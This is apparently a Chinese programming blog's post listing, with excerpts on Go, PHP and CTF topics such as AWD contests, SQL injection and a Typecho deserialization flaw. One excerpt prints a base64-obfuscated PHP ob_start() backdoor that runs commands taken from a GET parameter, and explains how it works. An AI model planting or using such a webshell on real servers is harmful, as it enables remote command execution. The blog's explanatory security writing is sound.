编程那点事 – 第 3 页

阿里云函数计算 + Aglio 实现 API Blueprint markdown 渲染

2019-08-01 • Go、JavaScript、随便写写 • 5156 字 / 12 分钟 • 4 条评论 • E99p1ant •2,183 次围观

这几天事一直很多，肝了几天终于完成的差不多了。这才有时间去写 Apicon。这次想聊聊 Apicon 里的一个核心的功能——API 文档的编辑与展示。我最初的想法是，像助手一样按照一定的格式，使用 Markdown 来编写文档。但是这样在格式上难免不好统一。跟副主席聊的时候，他向我推荐了 Swagger 和 API Blueprint。这两个都是 API 文档自动生成工具。对比过后，我决定选择

『自闭 PHP 内核』 vol1. 来写一个 PHP 扩展吧~

2019-07-152019-07-15 • PHP、编程那点事、随便写写 • 5648 字 / 14 分钟 • 暂无评论 • E99p1ant •1,254 次围观

之前学 C 语言的目标，就是想有一天能去看 PHP 的底层源码。一直对 PHP 挺惊讶的，她是一个很容易上手的语言，但是却是使用 C 语言编写的。C 语言原生能实现的功能，所含的库就不多语法残废，又十分地接近系统底层；很难想象像 PHP 这么一个语法宽松随便的语言，是怎样用 C 实现的。之前在协会分享会时，Hammer 学长曾带着我们去看了 PHP 源码中关于弱类型比较的部分，还用 gdb 一步

总结一下最近 beego 开发遇到的坑

2019-07-12 • Go、编程那点事、随便写写 • 2575 字 / 6 分钟 • 暂无评论 • E99p1ant •1,848 次围观

最近一直在写 Apicon 的主站，目前虽然还有很多功能没有写完，不过先配好了 Drone 直接上线了。因为我的前端实在是太菜了，Vue 写到后面暴露出了很多问题；索性就放弃了之前定下的前后端分离，直接用 beego 开始写 MVC 了。推翻之前所做的，确实需要一定勇气。不过就目前的情况看来，我还是挺满意这个决定的。期间遇到了不少问题以及坑，这里总结一下吧。自定义错误页自定义诸如 404

聊聊 PHP ob_start() 在开发中的应用

2019-06-062019-06-06 • PHP、随便写写 • 3018 字 / 7 分钟 • 暂无评论 • E99p1ant •1,880 次围观

先从安全聊起上周六协会 AWD，其中的 web1 中，有一个ob_start()的后门，具体代码是这样的： @ob_start(base64_decode(‘c3lzdGVt’)); echo “$_GET[persistent]”; @ob_end_flush(); 参照 PHP 的文档，我们其实可以知道这个后门的原理。 c3lzdGVt这一段，base64_decode出来的即为system

Vidar-Team 内部 AWD 线下赛总结

2019-06-012019-06-02 • CTF、Linux、PHP、Python、编程那点事、随便写写 • 4471 字 / 11 分钟 • 7 条评论 • E99p1ant •4,861 次围观

今天六一，协会举办了大一第一次线下 AWD。很开心最后我们组能获得第一。虽然上午被疯狂 Check Down 到自闭，但下午全靠 Moesang 大佬弹了四五个 Shell 疯狂cat /flag，同时 Y 也把 Pwn 给修好了。一下午就没怎么 Down 过，除了我中途修坏了一道 web 才 Down 了一轮。（是我太菜拖大家后腿了嘤嘤嘤这也是我第一次打 AWD 啊。这几天都在给 Lian

拉取、编译、部署，无人机升空！

2019-05-222019-05-22 • Go、编程那点事、随便写写 • 5094 字 / 12 分钟 • 暂无评论 • E99p1ant •2,317 次围观

编译型语言，就需要自动部署我记得上学期刚注册助手 Gita 时，我还打趣地问过部长，助手什么时候上 CI / CD？当时部长说快了，这学期就上。现在助手可以说每个项目完成后，都会使用 Drone 实现持续交付 / 持续集成。对于前端来说，因为助手主要是用 Vue 做单页应用，推送代码到 Gitea 上后，Drone 会使用 Vue CLI 对项目进行编译，之后将编译好的前端静态文件放进一个

记录一道把我整的要死要活的 SQL 布尔盲注题

2019-05-072019-05-07 • CTF、编程那点事、随便写写 • 2757 字 / 6 分钟 • 暂无评论 • E99p1ant •1,308 次围观

Jarvis OJ 启动！！五一假期已经只剩一天了啊。真的快。今天下午写 Go 时，室友在做南邮 CTF 上的 SQL 注入。那上面的两道 SQL 注入倒是挺基础的。但突然激起了我的兴趣 —— 想做做 SQL 注入了。到 Jarvis OJ 上翻了下，还真有一道 ISCC 2016 年的 SQL 注入。原以为 ISCC 的难度都不大的，结果最后居然做了一个多小时……还

从一个项目看 beego 的 MVC

2019-04-27 • Go、编程那点事、随便写写 • 5449 字 / 13 分钟 • 暂无评论 • E99p1ant •1,804 次围观

bilibili 干杯！🍻 最近 b 站源码泄露的事情闹得沸沸扬扬的，每天都有不同的瓜。昨天 GitHub 放出了 b 站写的 DMCA takedown 邮件。今天大家就在吐槽 b 站的小学级别英语了。嘛，撇开这些事情不谈，b 站这次的源码泄露，确实让很多人开始注意到了 Golang 这门语言。一时间不少人嚷嚷着说要开始学习 Golang，就从 b 站源码入手什么的。玩笑归玩笑，但 Gola

《高性能 PHP7》笔记

2019-04-242019-04-24 • PHP、编程那点事、随便写写 • 3948 字 / 9 分钟 • 1 条评论 • E99p1ant •1,357 次围观

类型声明 PHP 作为一个弱类型的语言，加入类型声明，真是一件大好事啊！这样确实能够减少很多 bug 的产生，今后也要试着养成写类型声明的习惯。形参类型声明 function foo(int $num){ echo($num); } // foo(123); -> 123 // foo(‘123’); -> 123 // foo(‘asd’); -> PHP Warning 这

DDCTF 2019 Web2 Writeup

2019-04-122019-07-16 • CTF、随便写写 • 6512 字 / 16 分钟 • 2 条评论 • E99p1ant •1,706 次围观

今天中午还在上物原课时，突然在群里看到 DDCTF 开始了！我天！不是明天吗？下课后赶紧回宿舍做题，嘛……还真挺硬核的。（其实是自己太菜了滴~ 出题人脑子有泡。 WEB 签到题个人感觉是很不错的题。如果没有被那个 Restlet Client 框架给坑了，今下午数据结构上机课上就出 flag 了。进入题目，发现提示没有权限访问，F12 打开开发者面板，发现会自动执行

抓了只水蓝色的地鼠玩玩

2019-04-082019-04-08 • Go、编程那点事、随便写写 • 2640 字 / 6 分钟 • 1 条评论 • E99p1ant •1,595 次围观

第一次听说 Golang，还是在上学期刚加入杭电助手的时候。当时跟大家还不熟，我在群里还挺腼腆的。当时部长开了个让我记忆犹新的玩笑：我们或许可以期待一下 Google 推出 ogle 语言。真香刚开始我其实一直对 Golang 无感，和部长半开玩笑半认真地吹 PHP，觉得 Go 能做的，PHP 其实也能做到。只是具体的实现方式不同罢了。但是前阵子在折腾 PHP 自动部署时，有过写一个类似

Typecho install.php 反序列化漏洞复现

2019-03-242020-07-17 • CTF、PHP、随便写写 • 5917 字 / 14 分钟 • 暂无评论 • E99p1ant •1,612 次围观

昨天0ctf，唯一的一道 web 还是 Java，那个鬼椒的 hint 也是无语。直接自闭了。对面的 bin 爷爷肝的不亦乐乎，web 狗只能在角落摸鱼。之后我便去复现周五协会培训时司大哥讲的 Typecho 反序列化漏洞。之前听的时候，到后半部分有些理不清了，自己尝试的时候才差不多搞明白。其实反序列化难就难在 pop 链的构造，真的是一环套一环啊。需要明白哪些变量使我们可控的，有哪些魔术方

反思一下近期的自己

2019-03-21 • PHP、随便写写 • 753 字 / 1 分钟 • 1 条评论 • E99p1ant •1,314 次围观

昨天和同学去协会坐了一下午，打算去和写后端的大佬配合修 bug 的。期间听到学长们的对话，司大哥看我之前读过 CodeIgniter 的源码，便问我 CodeIgniter 为什么比 ThinkPHP 更安全。唔……这还真的涉及到我的知识盲区了。当时支支吾吾地说不出话。感觉开学以来没那么有动力了，是因为在肝项目没去学新的东西了？我不知道。感觉这样下是肯定不行的。前方